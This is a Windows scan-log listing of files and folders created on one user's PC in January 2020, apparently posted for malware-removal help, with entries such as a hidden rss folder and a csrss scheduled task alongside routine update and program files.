2020-01-22 17:55 - 2020-01-22 20:47 - 000000000 ____D C:\Windows\erdnt
2020-01-22 17:29 - 2020-01-22 17:33 - 142164912 _____ (Microsoft Corporation) C:\Users\Jomko\Downloads\MSERT.exe
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\ProgramData\ESET
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\Program Files\ESET
2020-01-22 17:17 - 2020-01-22 17:17 - 005504960 _____ (ESET) C:\Users\Jomko\Downloads\eset_smart_security_premium_live_installer_rt_sk.exe
2020-01-22 15:00 - 2020-01-22 15:00 - 000335528 _____ C:\Windows\Minidump\012220-10062-01.dmp
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 __SHD C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 ____D C:\Windows\system32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479
2020-01-22 14:29 - 2020-02-07 20:45 - 000003182 _____ C:\Windows\system32\Tasks\csrss
2020-01-22 14:29 - 2020-01-22 17:00 - 000000000 ___HD C:\Windows\rss
2020-01-22 14:29 - 2020-01-22 14:30 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-01-22 14:29 - 2020-01-22 14:30 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-01-22 14:28 - 2020-01-22 14:28 - 000000000 _____ C:\Users\Jomko\Documents\codec m3u vlc
2020-01-22 12:39 - 2020-01-22 22:40 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-01-22 10:49 - 2020-01-22 14:41 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-01-21 11:01 - 2020-01-21 11:01 - 008000936 _____ (Tim Kosse) C:\Users\Jomko\Downloads\FileZilla_3.46.3_win64-setup.exe
2020-01-16 13:58 - 2020-01-16 13:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-01-16 13:57 - 2020-01-16 13:57 - 000000000 ____D C:\Program Files\Logitech
2020-01-16 00:57 - 2020-01-16 00:57 - 000000000 ____D C:\Windows\rescache
2020-01-15 23:25 - 2019-12-31 03:40 - 000123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-01-15 23:25 - 2019-12-31 03:32 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 004061624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 003967416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:41 - 001320248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000834048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:37 - 000709856 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000627424 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000263904 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000096992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-01-15 21:37 - 2020-01-03 04:37 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:36 - 000155360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-01-15 21:37 - 2020-01-03 04:35 - 001671296 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001010688 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:10 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:09 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-01-15 21:37 - 2020-01-03 04:05 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:04 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-01-15 21:37 - 2020-01-03 04:02 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:01 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-01-15 21:37 - 2020-01-03 04:01 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2020-01-15 21:37 - 2020-01-03 04:00 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-01-15 21:37 - 2020-01-03 03:57 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-01-15 21:37 - 2020-01-03 03:56 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-01-15 21:37 - 2020-01-03 03:55 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-01-15 21:37 - 2019-12-31 04:04 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\EOSNotify.exe
2020-01-15 21:37 - 2019-12-18 18:45 - 000390536 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-01-15 21:37 - 2019-12-18 17:48 - 000341896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-01-15 21:37 - 2019-12-17 03:39 - 025754624 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-01-15 21:37 - 2019-12-17 02:18 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 02:18 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2020-01-15 21:37 - 2019-12-17 02:06 - 002910720 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2020-01-15 21:37 - 2019-12-17 02:04 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 02:03 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:57 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:56 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:54 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:53 - 005500928 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 020290048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000797184 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:52 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2020-01-15 21:37 - 2019-12-17 01:49 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 01:45 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2020-01-15 21:37 - 2019-12-17 01:42 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2020-01-15 21:37 - 2019-12-17 01:36 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:35 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:33 - 002304000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-01-15 21:37 - 2019-12-17 01:32 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:31 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:28 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000662528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:26 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
